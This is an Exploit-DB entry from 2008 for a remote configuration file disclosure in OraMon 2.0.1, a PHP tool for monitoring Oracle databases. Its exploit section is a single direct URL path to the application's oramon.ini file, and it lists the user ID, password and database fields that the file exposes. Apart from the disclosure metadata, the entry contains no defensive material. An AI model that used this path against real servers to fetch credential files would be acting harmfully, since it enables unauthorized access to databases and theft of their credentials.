OraMon 2.0.1 - Remote Config File Disclosure Vulnerability

2008-11-29T00:00:00
ID EDB-ID:7286
Type exploitdb
Reporter ahmadbady
Modified 2008-11-29T00:00:00

Description

OraMon 2.0.1 Remote Config File Disclosure Vulnerability. CVE-2008-6869. Webapps exploit for php platform

                                        
                                            ........................

..............................................
+++++Bypass Config Download Vulnerability+++++
...............................................

script:Oramon = Oracle Database Monitoring

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
download:http://www.oramon.org/downloads/oramon.tar.gz

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
expl:

$USERID=
$PASSWORD=
$DATABASE=

www.site.com/path/config/oramon.ini

   
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  | | | | | |
Author: ahmadbady  
  | | | | | |
my mail: kivi_hacker666@yahoo.com | | | | | |
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-11-29]